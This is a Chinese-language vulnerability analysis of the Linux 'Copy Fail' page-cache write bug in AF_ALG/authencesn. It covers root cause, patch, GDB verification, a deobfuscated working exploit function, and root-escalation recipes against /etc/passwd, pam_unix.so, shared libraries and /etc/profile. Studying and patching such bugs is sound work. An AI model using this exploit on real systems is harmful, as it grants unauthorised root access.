splice()是 Linux 提供的一种高性能数据传输系统调用。它的核心思想是避免数据在内核空间和用户空间之间来回复制——通过直接在内核管道 buffer 之间移动页面引用。

普通的read()+write()流程需要将文件数据拷贝到用户空间 buffer，再从用户空间 buffer 拷贝到目标。而splice()直接把文件的 page cache 页面引用传递给管道的另一端，全程不发生数据拷贝。

在 AF_ALG 加密接口中，splice()被用来将文件数据"喂"给加密算法。此时文件的page cache pages 被直接放入 TX SGL——这些 SGL entry 中的page_link直接指向全局共享的 page cache 页面。这是一个关键的设计决策：如果后续有任何代码路径向这个 SGL 写入数据，就相当于直接修改了文件的 page cache。

2.4 AF_ALG：用户空间加密接口

Linux 内核提供了一套用户空间可以直接使用的加密 API，叫做AF_ALG（Address Family: Algorithm）。它的接口设计为 socket 风格：

import socket, os
AF_ALG = 38
SOL_ALG = 279
# 1. 创建 AF_ALG socket，指定使用的加密算法
alg_sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
# 绑定算法名称，例如 AEAD 类型的 gcm(aes)
alg_sock.bind(("aead", "gcm(aes)"))
alg_sock.setsockopt(SOL_ALG, 1, key_bytes)    # ALG_SET_KEY: 设置密钥
alg_sock.setsockopt(SOL_ALG, 4, None, 16)     # ALG_SET_AEAD_AUTHSIZE: 设置 auth tag 大小
# 2. accept 获得一个操作用的 socket
op_sock = alg_sock.accept()[0]
# 3. 通过 sendmsg 发送待加密/解密的数据
#    cmsg 中通过控制消息指定操作类型(加密/解密)、IV、AAD 长度等参数
op_sock.sendmsg([plaintext_data], control_messages)
# 4. recv 获取加密/解密结果（内核在此时执行实际的加解密操作）
result = op_sock.recv(output_buffer_size)

AF_ALG 还支持通过splice()把文件内容直接"喂"给加密算法，避免数据在内核空间和用户空间之间来回复制。这一特性是 Copy Fail 利用链的关键：splice 进入的文件数据在内核中以 page cache page 引用的形式存入 TX SGL，而不是数据拷贝。

在内核中，algif_aead.c负责处理 AEAD 类型的加密请求。它管理 TX SGL（用户发送的数据）和 RX SGL（用户接收 buffer），并最终调用底层加密算法（如authencesn）执行实际的加解密操作。

2.5 AEAD 认证加密与 authencesn 的 scratch write

AEAD（Authenticated Encryption with Associated Data）是一类同时提供保密性和完整性保证的加密方案。它处理的数据格式为：

输入:  AAD (Associated Data) || Ciphertext || Auth Tag
输出:  AAD || Plaintext

其中 AAD 是明文关联数据（不加密但参与认证），Ciphertext 是密文，Auth Tag 是认证标签。

authencesn是 Linux 内核中的一个 AEAD 算法实现，全称 "authenc with Extended Sequence Number"，为 IPsec 的 ESN（扩展序列号）协议设计。

AAD 的含义

在 AEAD 加密中，AAD（Associated Data）是"需要认证但不需要加密"的附加数据。比如在 TLS 中，AAD 是记录头（内容类型、协议版本、数据长度）；在 IPsec 中，AAD 包含安全参数索引和序列号。不同场景下 AAD 的具体内容不同，但 AEAD 算法只需要知道"前assoclen字节是 AAD"即可。

authencesn 为什么要向 dst buffer 写数据

ESN 协议使用 64 位序列号（防止回绕攻击），但网络传输中只携带低 32 位，高 32 位由通信双方本地维护。authencesn 需要在 HMAC 计算时纳入完整的 64 位序列号。它的做法是：

将序列号的高 32 位放在 AAD[4:8] 中
在计算 HMAC 之前，把 AAD[4:8]临时写入dst buffer 中 auth tag 原本所在的位置（这样 HMAC 计算就能覆盖完整序列号）
HMAC 完成后再还原

这个"临时写入"就是所谓的ESN scratch write：

// crypto/authencesn.c - crypto_authenc_esn_decrypt()
// 从 AAD 中读取前 8 字节
scatterwalk_map_and_copy(tmp, req->dst, 0, 8, 0);
// 在 IPsec 场景: tmp[0] = SPI, tmp[1] = SeqNo_Hi
unsigned int cryptlen = req->cryptlen;
cryptlen -= authsize;  // 定位到 auth tag 区域的起始
// 将 AAD[4:8] 临时写入 dst 中 tag 区域，供 HMAC 计算使用
scatterwalk_map_and_copy(tmp + 1, req->dst, assoclen + cryptlen, 4, 1);
//                       ^^^^^^^^                                ^
//                    AAD[4:8]                               4字节, 1=写方向

写入大小是硬编码的 4 字节（sizeof(u32)），写入的值来自 AAD[4:8]。

在 IPsec 的正常场景中，req->dst指向内核通过kmalloc分配的连续 buffer，AAD[4:8] 是合法的序列号数据。临时写入和还原完全无害。

AF_ALG 打开的攻击面

但是通过 AF_ALG 接口，用户空间可以直接调用 authencesn 算法，并且完全控制 AAD 的内容。authencesn 不做任何校验——它不关心 AAD[4:8] 到底是不是真正的 ESN 序列号，只是机械地把这 4 字节写入 dst 的固定偏移处。

只要把想写入 page cache 的数据放进 AAD[4:8]，authencesn 就会忠实地把它写入 dst 的固定偏移处。

那么问题来了——如果req->dst中包含的不是 kmalloc buffer，而是page cache pages呢？

三、漏洞成因分析

3.1 漏洞引入：一个合理的优化

2017 年 7 月，内核开发者 Stephan Mueller 提交了 commit72548b093ee3，标题是 "crypto: algif_aead - copy AAD from src to dst"。

这个 commit 要解决的是一个真实的 bug。在此之前，algif_aead的解密路径使用out-of-place模式：

// 2017 之前: out-of-place
aead_request_set_crypt(&areq->aead_req,
                       areq->tsgl,              // req->src = TX SGL（输入数据）
                       areq->first_rsgl.sgl.sg, // req->dst = RX SGL（用户接收 buffer）
                       used, ctx->iv);

TX SGL 包含用户通过sendmsg()和splice()发送进来的全部数据（AAD + 密文 + 认证标签），RX SGL 指向用户空间的接收 buffer。AEAD 规范要求解密结果包含 AAD，但底层算法只处理密文部分，AAD 需要调用方自行从 src 复制到 dst。旧版algif_aead没做这个复制，导致用户收到的输出中 AAD 区域是全零。

commit72548b093ee3的修复方案分三步：

先把 AAD + 密文从 TX SGL 复制到 RX buffer
（memcpy_sglist），这样 AAD 就出现在输出中了
把 TX SGL 中认证标签（auth tag）所在的 page 通过sg_chain()链接到 RX SGL 尾部
——因为 AEAD 解密需要读取 tag 来做认证校验，tag 不属于输出但必须在 dst SGL 中可达
设置req->src = req->dst = RX SGL
（此时 RX SGL 已包含 AAD + 密文 + chained tag pages）

// 2017 之后的漏洞代码 (in-place)
// Step 1: 复制 AAD+密文 到 RX buffer
memcpy_sglist(rsgl, tsgl_src, outlen);  // outlen = assoclen + cryptlen - authsize
// Step 2: 从 TX SGL 中取出 tag pages
af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
// Step 3: 链到 RX SGL 尾部
sg_chain(rsgl_sg, rsgl_nents, areq->tsgl);
// Step 4: in-place — src 和 dst 都指向 这个 combined RX SGL
aead_request_set_crypt(&areq->aead_req,
                       rsgl_src,   // req->src = RX SGL (含 chained tag pages)
                       rsgl_dst,   // req->dst = RX SGL (同一个!)
                       used, ctx->iv);

功能上这完美解决了 AAD 复制问题。但问题出在 Step 2 中取出的tag pages——它们来自 TX SGL，而 TX SGL 中通过splice()进入的数据直接引用了文件的 page cache pages。这些 page cache pages 现在被 chain 到了req->dst中。

3.2 设计假设冲突

问题的本质是两个子系统之间存在一个从未被明确约定的隐含假设冲突：

在 authencesn 的所有其他调用场景中（主要是 IPsec/xfrm），dst 确实是内核分配的连续 buffer。algif_aead的 in-place 优化是第一个（也是唯一一个）将 page cache pages 放入req->dstSGL 的代码路径。

3.3 完整触发路径

现在把整个漏洞触发过程从头到尾走一遍。假设目标是向某个文件的偏移t处写入 4 字节可控数据。

Step 1：用户空间发送数据

利用时设置以下参数：

assoclen = 8
（AAD 长度，通过 sendmsg 的控制消息指定）
authsize = 4
（认证标签大小，通过setsockopt(ALG_SET_AEAD_AUTHSIZE)设置）

然后分两步向 AF_ALG socket 发送数据：

# 要写入的 4 字节数据
evil_bytes = b'\xde\xad\xbe\xef'
# Step 1: 通过 sendmsg 发送 8 字节 AAD
# AAD[0:4] = 任意填充, AAD[4:8] = 要写入 page cache 的数据
# authencesn 会把 AAD[4:8] 作为 ESN seqno_lo 写入 scratch 区域
aad = b'\x00\x00\x00\x00' + evil_bytes   # 8 字节
op.sendmsg([aad], cmsg, MSG_MORE)  # MSG_MORE: 后续还有数据
# Step 2: 通过 splice 将目标文件的前 t+4 字节送入 AF_ALG socket
# splice 直接传递 page cache page 引用，不复制数据
pipe_r, pipe_w = os.pipe()
target_fd = os.open("/usr/bin/su", os.O_RDONLY)
os.splice(target_fd, pipe_w, t + 4, offset_src=0)  # 文件 → 管道
os.splice(pipe_r, op.fileno(), t + 4)               # 管道 → AF_ALG socket

Step 2：TX SGL 布局

两次发送后，内核中的 TX SGL 包含：

TX SGL:
+--------------------+----------------------------------------+
| sendmsg data (8B)  | splice data (t+4 bytes)                |
| AAD: 4 zero bytes  | file[0:t+4]                            |
|+ evil_bytes  | page cache page refs via splice        |
|  (kmalloc memory)  | (points to GLOBAL SHARED page cache!)  |
+--------------------+----------------------------------------+

从 AEAD 解密的视角来解读这段连续数据：

AAD
= 前assoclen=8字节 = sendmsg 发送的\x00\x00\x00\x00+evil_bytes
密文 (Ciphertext)
= 中间t字节 = file[0:t]（文件的前 t 字节被当成"密文"）
认证标签 (Auth Tag)
= 最后authsize=4字节 = file[t:t+4]

总字节数 = 8 + t + 4 = t + 12。

Step 3：recv 触发解密 → in-place SGL 构建

调用recv()触发_aead_recvmsg()。漏洞代码执行以下操作：

outlen = assoclen + (cryptlen - authsize) = 8 + ((t+4) - 4) = t + 8
(1) memcpy_sglist(RX buffer, TX SGL, outlen=t+8):
Copy first t+8 bytes of TX SGL to RX buffer (user-space allocated memory)
    RX buffer contents:
      [0:8]   = copy of AAD (sendmsg data)
      [8:8+t] = copy of file[0:t] (ciphertext portion)
    Note: this is a DATA COPY, not a page reference
(2) af_alg_pull_tsgl(TX SGL, skip=t+8, take=4):
    Skip first t+8 bytes of TX SGL, extract last 4 bytes (tag region)
    These 4 bytes in TX SGL correspond to file[t:t+4] from splice
-> SGL entry: { page = file's page cache page, offset = t%4096, length = 4 }
-> This is the ORIGINAL page cache reference, NOT a copy!
(3) sg_chain(RX SGL tail, tag SGL):
    Chain the tag page reference to the end of RX SGL

最终的 combined dst SGL（也是 src）布局：

combined dst SGL (= req->src = req->dst):
+-- RX buffer (user-space, SAFE) ----+  +-- chained tag (PAGE CACHE!) ------+
||||
| AAD (8B)  |  ciphertext (tB)       |->|  file[t:t+4] in page cache       |
||=copy of file[0:t]   ||  original page ref from splice   |
||||
+-- offset 0                t+8 -----+  +-- offset t+8               t+12 -+

关键点：RX buffer 部分是内核分配的用户空间内存（安全），但尾部 chained 的 tag pages 是文件的 page cache 原始页面引用。

Step 4：authencesn 的 scratch write → 命中 page cache

crypto_authenc_esn_decrypt()开始执行。ESN scratch write 的目标位置计算：

// crypto_authenc_esn_decrypt() 的 scratch write:
// 先读取 AAD[0:8]
scatterwalk_map_and_copy(tmp, req->dst, 0, 8, 0);  // tmp[0]=AAD[0:4], tmp[1]=AAD[4:8]
unsigned int cryptlen = req->cryptlen;  // = t + 4 (密文 + tag 的长度)
cryptlen -= authsize;                   // = t + 4 - 4 = t
// 将 tmp[1] (= AAD[4:8] = evil_bytes) 写入 dst[assoclen + cryptlen]
scatterwalk_map_and_copy(tmp + 1, req->dst, assoclen + cryptlen, 4, 1);
//                       ^^^^^^^^                  ^^^^^^^^^^^^^^^^  ^
//                    = AAD[4:8]                   = 8 + t          写方向
//                    = evil_bytes

写入位置是 dst SGL 的偏移8 + t。对照上面的 combined SGL 布局：

RX buffer 部分占据 [0, t+8)，共 t+8 字节
chained tag pages 从偏移 t+8 开始

8 + t恰好是 RX buffer 的边界，也就是chained tag pages 的起始位置。

而 tag pages 是 file[t:t+4] 的 page cache 原始引用。所以 scratch write 写入的就是文件 page cache 中偏移t处的 4 字节。

写入的值 =tmp[1]= AAD[4:8] = 通过 sendmsg 传入的evil_bytes。

至此链条闭合：写入位置通过 splice 长度控制（决定 t），写入内容通过 sendmsg 的 AAD[4:8] 控制。两者都是用户空间可自由指定的参数。

为什么写入不可逆？

解密完成后，crypto_authenc_esn_decrypt_tail()会尝试恢复被 scratch write 覆盖的数据。但这里有一个关键细节：它先读取dst[8+t]处的当前值（此时已是 payload），然后写回 AAD[0:8] 到dst[0:8]。dst[8+t] 处从未被写回原始值。

而且 HMAC 校验必然失败（因为数据已被篡改），recvmsg返回-EBADMSG。但此时 page cache 写入已经发生，无法回滚。漏洞利用时只需忽略这个错误即可。

3.4 控制能力分析

写入位置：通过调整splice()的长度（= t + authsize = t + 4）来控制 t，即写入的目标文件偏移。每次调用可以定位到文件中的任意偏移处。

写入内容：通过 sendmsg 发送的 AAD[4:8]（4 字节），完全可控。

写入大小：固定 4 字节。这不是由setsockopt(ALG_SET_AEAD_AUTHSIZE)决定的——authsize 只影响偏移计算中的cryptlen -= authsize。4 字节是 authencesn 中硬编码的sizeof(u32)（ESN 序列号高 32 位的大小）。单次写入字节数无法改变，但多次调用即可覆盖文件的连续区域。

目标文件：任何当前用户有读权限的文件。PoC 用O_RDONLY打开文件，不需要写权限，因为写入路径不经过 VFS 的权限检查。

总结：

写入目标: file page cache[t : t+4]
写入值:   sendmsg 发送的 AAD[4:8] (4 字节, 完全可控)
写入大小: 固定 4 字节 (authencesn 硬编码的 u32)
触发条件: assoclen=8, authsize=4, splice 长度=t+4
文件权限: 只需 O_RDONLY，不需要写权限
根本原因: dst SGL 尾部 chained 的 tag pages 是 splice 引入的 page cache 原始引用

3.5 补丁分析

修复补丁a664bf3d603d的作者 Herbert Xu 在 commit message 中写道：

This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings.

修复方案：去掉 in-place 模式，让req->src和req->dst重新指向不同的 SGL：

// 修复后: out-of-place
// src = TX SGL (包含 page cache pages，但只读)
// dst = RX SGL (纯用户空间 buffer)
aead_request_set_crypt(&areq->aead_req,
                       tsgl_src,   // req->src = TX SGL
                       rsgl_dst,   // req->dst = RX SGL (独立!)
                       used, ctx->iv);
// AAD 通过显式 memcpy 复制到 RX buffer
memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);

修复后，req->dst只包含用户空间分配的 RX buffer，不再有 page cache pages。authencesn 的 scratch write 写入的是用户自己的接收缓冲区——完全无害。

补丁净删除约 92 行代码：移除了 tag page chain、in-place 分支、af_alg_pull_tsgl的 offset 参数等所有为 in-place 操作添加的复杂逻辑。整个sg_chain()调用被彻底消除——不再有任何 page cache page 出现在req->dst中的可能。（补丁全文可在GitHub查看。）

四、PoC 分析与动态验证

4.1 公开 PoC 结构

公开的Copy Fail PoC是一个 732 字节的高度混淆 Python 脚本，通过 base64 + zlib 压缩嵌套了真正的利用代码。解码后的核心是一个page_cache_write_4bytes(fd, offset, value)函数，它执行上述漏洞触发路径来向指定文件的 page cache 写入 4 字节。

PoC 的完整利用流程是：

打开/usr/bin/su（SUID root binary）的只读 fd
多次调用page_cache_write_4bytes()，将/usr/bin/su的前 160 字节 ELF header 覆盖为一个精心构造的 ELF payload（包含一段获取 root shell 的 shellcode）
执行被篡改的/usr/bin/su→ 获得 root shell

这里有一个有趣的细节：PoC 是用O_RDONLY打开目标文件的。对于常规的 VFS 写操作，只读 fd 会被内核拒绝。但 Copy Fail 的写入路径不经过 VFS 的权限检查——它通过 crypto 子系统的 scratch write 直接修改 page cache 页面。这意味着任何可读文件都是潜在的攻击目标，包括被挂载为 readOnly 的文件。

4.2 核心函数实现

去混淆后的核心函数（对照 Section 3 的数据流）：

AF_ALG = 38
SOL_ALG = 279
ASSOCLEN = 8    # AAD 长度
AUTHSIZE = 4    # auth tag 大小 (也影响偏移计算)
def page_cache_write_4bytes(fd, offset, value):
"""向 fd 指向文件的 page cache[offset : offset+4] 写入 value (4字节)"""
# 创建 AF_ALG socket, 绑定 authencesn(hmac(sha256),cbc(aes)) 算法
    s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    s.setsockopt(SOL_ALG, 2,  # ALG_SET_KEY: 密钥 (全零, 内容不影响漏洞触发)
b'\x08\x00\x01\x00'    # rtattr 头
b'\x00\x00\x00\x10'    # enckeylen=16 (AES-128)
                 + b'\x00' * 32)         # 16B authkey + 16B enckey
    s.setsockopt(SOL_ALG, 4, None, AUTHSIZE)  # ALG_SET_AEAD_AUTHSIZE = 4
    op = s.accept()[0]
# 构造 8 字节 AAD: 前 4B 填充零, 后 4B 是要写入 page cache 的 value
# authencesn 会把 AAD[4:8] (= value) 写入 dst[assoclen + cryptlen]
    aad = b'\x00' * 4 + value   # 8 字节
    op.sendmsg([aad],
               [(SOL_ALG, 2, b'\x00' * 4),             # ALG_OP_DECRYPT
                (SOL_ALG, 3, b'\x10' + b'\x00' * 19),   # IV = 16B zero
                (SOL_ALG, 4, struct.pack('I', ASSOCLEN))], # assoclen = 8
               socket.MSG_MORE)
# 通过 splice 将目标文件的 [0, offset+4) 送入 AF_ALG socket
# splice 传递 page cache page 引用 (零拷贝)
    pr, pw = os.pipe()
    os.splice(fd, pw, offset + AUTHSIZE, offset_src=0)
    os.splice(pr, op.fileno(), offset + AUTHSIZE)
try:
        op.recv(ASSOCLEN + offset)  # 触发 _aead_recvmsg → authencesn scratch write
except OSError:
pass  # HMAC 校验失败返回 EBADMSG, 但 page cache 写入已完成
    op.close(); s.close(); os.close(pr); os.close(pw)

4.3 QEMU + GDB 内核级验证

为了从内核层面验证漏洞的完整触发路径，需要搭建一个可控的调试环境：在 QEMU 中运行带有调试符号的 Linux 6.12.8 内核，通过 GDB 远程调试在关键函数设置断点，捕获完整的执行链。

实验环境代码
本节涉及的所有脚本和配置文件：GitHub Gist — QEMU Debug Environment
GDB 断点脚本：GitHub Gist — GDB Scripts

4.3.1 搭建调试环境

整个调试环境通过 Docker 构建（避免在 macOS 上配置交叉编译链），产出三个文件：压缩内核bzImage、调试符号vmlinux、以及包含 PoC 工具的 initramfs。

# 构建内核 + busybox + PoC (通过 Docker，约 10 分钟)
docker build -t copyfail-build -f Dockerfile .
docker run --rm -v $(pwd)/output:/output copyfail-build
# 产出:
#   output/bzImage        — 压缩内核 (4.8M)
#   output/vmlinux        — 带 DWARF 调试符号 (126M, 给 GDB 用)
#   output/rootfs.cpio.gz — initramfs (含 busybox + poc_pagecache_write)

内核配置的关键选项（确保 crypto 子系统和调试符号完整）：

CONFIG_CRYPTO_USER_API_AEAD=y    # AF_ALG AEAD 接口
CONFIG_CRYPTO_AUTHENC=y          # authenc 模块
CONFIG_CRYPTO_SEQIV=y            # 序列号 IV
CONFIG_DEBUG_INFO_DWARF5=y       # 完整调试符号
CONFIG_GDB_SCRIPTS=y             # GDB helper scripts
CONFIG_KALLSYMS_ALL=y            # 所有内核符号可见

启动 QEMU 虚拟机：

# 普通启动 (直接进入 shell)
./run_qemu.sh
# 调试模式 (QEMU 暂停, 等待 GDB 连接到 :1234)
./run_qemu.sh debug

在另一个终端连接 GDB：

gdb ./vmlinux -ex 'target remote :1234' -ex 'continue'

4.3.2 实验 1：Page Cache 写入验证

在 QEMU 虚拟机的 shell 中，执行自动化实验脚本：

# === VM 内执行 ===
# 1. 创建测试文件
echo "AABBCCDD EEFFGGHH IIJJKKLL MMNNOOPP" > /tmp/target.txt
hexdump -C /tmp/target.txt
# 00000000  41 41 42 42 43 43 44 44  20 45 45 46 46 47 47 48  |AABBCCDD EEFFGGH|
# 00000010  48 20 49 49 4a 4a 4b 4b  4c 4c 20 4d 4d 4e 4e 4f  |H IIJJKKLL MMNNO|
# 00000020  4f 50 50 0a                                        |OPP.|
# 2. 第一次写入: offset 0, value 0xDEADBEEF
poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF
# [*] Target: /tmp/target.txt
# [*] Offset: 0 (0x0)
# [*] Value:  0xdeadbeef
# [*] Writing 4 bytes to page cache...
# [+] Done. Page cache of /tmp/target.txt at offset 0 should now contain 0xdeadbeef
# 3. 验证写入结果
hexdump -C /tmp/target.txt | head -2
# 00000000  ef be ad de 43 43 44 44  20 45 45 46 46 47 47 48  |....CCDD EEFFGGH|
#           ^^^^^^^^^^^
#           0xDEADBEEF (little-endian)
# 4. 第二次写入: offset 8, value 0xCAFEBABE
poc_pagecache_write /tmp/target.txt 8 0xCAFEBABE
# 5. 验证两次写入互不干扰
hexdump -C /tmp/target.txt | head -2
# 00000000  ef be ad de 43 43 44 44  be ba fe ca 46 47 47 48  |....CCDD....FGGH|
#                                    ^^^^^^^^^^^
#                                    0xCAFEBABE (little-endian)
# 6. drop_caches 行为验证 (tmpfs 上的文件不会恢复)
echo 3 > /proc/sys/vm/drop_caches
hexdump -C /tmp/target.txt | head -2
# 00000000  ef be ad de 43 43 44 44  be ba fe ca 46 47 47 48  |....CCDD....FGGH|
# ↑ tmpfs: 数据只存在于 page cache, drop_caches 不驱逐
# ↑ 磁盘文件系统 (ext4): drop_caches 后会从磁盘重新加载原始数据

结论：4 字节 page cache 写入原语有效，偏移精确可控，多次写入互不干扰。

4.3.3 实验 2：GDB 证据链 — SGL 布局与 Scratch Write

这是最关键的实验：通过 GDB 在crypto_authenc_esn_decrypt入口处观察req->src == req->dst（证实 in-place），并追踪scatterwalk_map_and_copy的写操作落在 page cache page 上。

# === 终端 1: 启动 QEMU (debug 模式) ===
./run_qemu.sh debug
# === Debug mode: QEMU paused, waiting for GDB on localhost:1234 ===
# === 终端 2: 连接 GDB，加载 Python 断点脚本 ===
gdb ./vmlinux -x exp3_2_gdb.py
# [GDB Script] Setting up breakpoints for Experiment 3.2+3.3...
# Breakpoint 1 at 0xffffffff812984f8: file crypto/authencesn.c, line 263.
# [GDB] BP1: crypto_authenc_esn_decrypt (entry)
# Breakpoint 2 at 0xffffffff8128f93e: file crypto/scatterwalk.c, line 57.
# [GDB] BP2: scatterwalk_map_and_copy (writes only)
(gdb) target remote :1234
(gdb) continue

在 VM shell 中执行 PoC（poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF），GDB 自动捕获以下输出：

============================================================
=== crypto_authenc_esn_decrypt ENTRY ===
req       = 0xffff888002d96a90
req->src  = 0xffff888002d96820
req->dst  = 0xffff888002d96820
src == dst:YES (IN-PLACE!)          ← 漏洞根因确认
assoclen  = 8
cryptlen  = 4 (before -= authsize)
============================================================
--- dst SGL entries ---
SGL[0]: page_link=0xffffea000006f440 offset=1760 length=8
SGL[1]: page_link=0xffff8880027cbda1 offset=0 length=0 [CHAIN]
SGL[2]: page_link=0xffffea000006f8c2 offset=0 length=4 [LAST]
=== [HIT 1] scatterwalk_map_and_copy WRITE ===
buf=0xffffc90000113d20 sg=0xffff888002d96820 start=4 nbytes=4
writing value:0x41414141
backtrace:
#0 scatterwalk_map_and_copy
#1 crypto_authenc_esn_decrypt      ← seqno_hi 写入 dst[4..7]
#2 _aead_recvmsg
#3 aead_recvmsg
#4 sock_recvmsg_nosec
#5 sock_recvmsg
=== [HIT 2] scatterwalk_map_and_copy WRITE ===
buf=0xffffc90000113d24 sg=0xffff888002d96820 start=8 nbytes=4
writing value:0xdeadbeef            ← ★ SCRATCH WRITE:命中 page cache!
backtrace:
#0 scatterwalk_map_and_copy
#1 crypto_authenc_esn_decrypt      ← dst[assoclen+cryptlen] = dst[8+0] = page cache
#2 _aead_recvmsg
...
=== [HIT 3] scatterwalk_map_and_copy WRITE ===
buf=0xffffc90000113cc8 sg=0xffff888002d96820 start=0 nbytes=8
writing value:0x41414141
backtrace:
#0 scatterwalk_map_and_copy
#1 crypto_authenc_esn_decrypt_tail ← ESN header 恢复 (HMAC 后清理)
...

GDB 输出的关键解读：

SGL 布局验证完毕，调用链recv()→_aead_recvmsg→crypto_authenc_esn_decrypt→scatterwalk_map_and_copy(WRITE)→ page cache 已完整捕获。

4.3.4 实验 3：修复版内核对比

在相同环境下，替换为打了补丁a664bf3d603d的 6.12.85 内核重复实验：

# 使用修复版内核启动
BZIMAGE=bzImage.patched VMLINUX=vmlinux.patched ./run_qemu.sh debug

GDB 输出对比：

============================================================
=== crypto_authenc_esn_decrypt ENTRY ===
  req       = 0xffff888002dcea90
  req->src  = 0xffff888002e6d880
  req->dst  = 0xffff888002dce820
  src == dst: NO                       ← 修复: out-of-place 模式
  assoclen  = 8
  cryptlen  = 4 (before -= authsize)
============================================================
  --- dst SGL entries ---
  SGL[0]: page_link=0xffffea000006f582 offset=1760 length=8 [LAST]
                                                              ^^^^
  ↑ 仅 1 个 entry, 无 CHAIN, 无 page cache page!
=== [HIT 1] scatterwalk_map_and_copy WRITE ===
  writing value: 0x41414141
  sg->page_link = 0xffffea000006f582   ← 写入 RX buffer (用户空间), 安全
=== [HIT 2] scatterwalk_map_and_copy WRITE ===
  writing value: 0xdeadbeef
  sg->page_link = 0xffffea000006f582   ← 同样写入 RX buffer, 无副作用

五、一个反复出现的漏洞模式：页缓存覆写

2022 年的 Dirty Pipe、2026 年的 Copy Fail 和紧随其后的 Dirty Frag 共享一个明确的漏洞模式：`splice()`零拷贝将文件的 page cache page 引用传入内核子系统，该子系统的某条代码路径对这些引用执行写操作（pipe merge、crypto scratch write、in-place decrypt），导致文件页缓存被篡改。这一模式已在三个独立的内核子系统中反复出现：

三者的触发路径各不相同，但共享同一核心结果：内核代码路径绕过 VFS 写权限检查，通过 splice 注入的 page 引用直接修改文件页缓存内容。由于修改不经过 VFS 写路径，页面不会被标记为 dirty，磁盘上的原始文件不受影响——篡改仅存在于内存中的页缓存，重启或drop_caches后恢复。

更早的Dirty COW(CVE-2016-5195, 2016) 通过完全不同的机制（mmapCOW 竞态条件 + GUP）达到了相似的结果——非授权修改文件数据。但 Dirty COW 不涉及 splice 或 in-place 操作，其竞态成功后修改会通过 page writeback 写回磁盘（设置 PG_dirty），属于不同类别的漏洞。

原语等价，利用面自然也相同。以下以 Copy Fail 为例，展示"对任意可读文件页缓存的 4 字节可控写入"这一原语在宿主机上除 SUID 文件之外的其他攻击面——以下所有路径均已在 CentOS Stream 8（未修补内核 4.18.0-553）上实验确认可行，结论对同类页缓存覆写漏洞通用。

实验代码
本节涉及的所有 PoC 脚本：https://github.com/0xlane/pagecache-guard/tree/main/poc/host-attacks

5.1 /etc/passwd UID 篡改

/etc/passwd在所有 Linux 发行版上的权限均为 0644（世界可读），是此类漏洞利用的天然目标。

原理：将目标用户的 UID 字段从1000改为0000——仅修改一个 ASCII 字符。Linux 通过 UID 判断用户身份，UID 为 0 即 root。

# 修改前: testuser123:x:1000:1000::/home/testuser123:/bin/bash
python3 exp_passwd_uid.py testuser123
# [+] SUCCESS: UID changed to 0000 in page cache
id testuser123
# uid=0(root) gid=0(root) groups=0(root)
su - testuser123
# whoami → root
# 可以读 /etc/shadow ✅
# 恢复
echo 3 > /proc/sys/vm/drop_caches

仅 1 次 4 字节写入即可完成提权。无需 shellcode，无需了解 ELF 结构——所有发行版通用。修改未设置PG_dirty，drop_caches可恢复。

5.2 PAM 认证绕过

pam_unix.so是 Linux 标准密码认证模块，权限通常为 0644。

原理：修改pam_unix.so中pam_sm_authenticate函数的密码校验逻辑——将返回值保存指令mov %eax,%ebp（89 c5）替换为xor %ebp,%ebp（31 ed），强制返回PAM_SUCCESS（0）：

; 密码校验后保存返回值
0x3d5e:  89 c5           mov  %eax, %ebp    ; 原始: 保存真实的校验结果
; 修改为:
0x3d5e:  31 ed           xor  %ebp, %ebp    ; 篡改: 强制清零 = PAM_SUCCESS

python3 exp_pam_bypass.py
# [*] Auto-detected patch offset: 0x3d5e
# [*] Patching to: 31ede95e (xor %ebp,%ebp)
# [+] SUCCESS: pam_unix.so patched in page cache
su root
# Password: (任意输入)
# whoami → root ✅

持久性特殊：sshd、login、sd-pam等进程通过mmap(MAP_PRIVATE)加载了pam_unix.so。这些 mmap 引用使得drop_caches无法驱逐被篡改的页面——内核在invalidate_inode_page()中检测到page_mapped()为真时跳过驱逐。修改将持续到所有映射进程退出或文件 inode 被替换（yum reinstall pam）。

5.3 共享库 Live-Patching

Linux 通过mmap(MAP_PRIVATE)加载.so共享库，所有使用同一库的进程共享同一组 page cache 物理页。修改.so的 page cache等价于修改所有已加载该库的运行中进程的代码或数据段——x86 缓存一致性协议确保写入对所有核心的指令和数据获取立即可见。

实验在libnss_files.so（系统 NSS 名称解析库，0644）上验证，通过一个持续运行的监控进程观察修改效果：

# Step 1: 启动监控进程，持续读取 mmap 映射中的字符串
gcc -o monitor exp_shared_lib_monitor.c -ldl
./monitor &
# [monitor] PID=161045
# [monitor] initial: "/etc/hosts"
# [monitor] tick 1: no change
# [monitor] tick 2: no change
# Step 2: 篡改 .so 的 page cache (另一终端)
python3 exp_shared_lib.py
# [+] SUCCESS: '/etc/hosts' → '/etc/h0sts' in page cache
# Step 3: 监控进程无需重启即检测到变化
# [monitor] tick 3: *** STRING CHANGED ***
# [monitor] now: "/etc/h0sts"
# [monitor] *** LIVE-PATCH CONFIRMED (no restart) ***

关键证据：监控进程 PID=161045 从启动到结束从未重启。它在 tick 1-2 读到原始值，PoC 执行后在 tick 3立即看到修改。

CentOS 8 上有 20+ 系统守护进程（sshd、crond、dockerd、dbus-daemon 等）持有libnss_files.so的 mmap 引用，drop_caches无法驱逐——修改在系统运行期间半永久存在，恢复需要yum reinstall glibc-common。

风险
修改核心系统库（如libc.so）的代码段虽然理论上可实现任意代码执行（所有调用目标函数的 root daemon 立即受影响），但存在极高的系统崩溃风险。上述实验仅修改了.rodata段中的字符串作为安全验证。

5.4 /etc/profile 命令注入

/etc/profile在所有 Linux 发行版上均为 0644 且被每个登录 shell 自动 source（SSH 登录、su -、控制台登录）。

原理：利用注释行中的#作为掩护——覆盖注释文本为命令，原始文本被#注释掉，不影响文件其余功能：

# 原始: # It's NOT a good idea to change this file unless you know what you
# 注入: id>>/tmp/CF-PWNED  #ea to change this file unless you know what you
#       ↑ 命令部分            ↑ '#' 注释掉剩余文本, 不影响后续行

python3 exp_profile_inject.py "id>>/tmp/CF-PWNED  #"
# [*] Payload: 20 bytes, 5 writes
# [+] SUCCESS: command injected into /etc/profile
# 触发: root 执行登录 shell
su - root -c "echo triggered"
cat /tmp/CF-PWNED
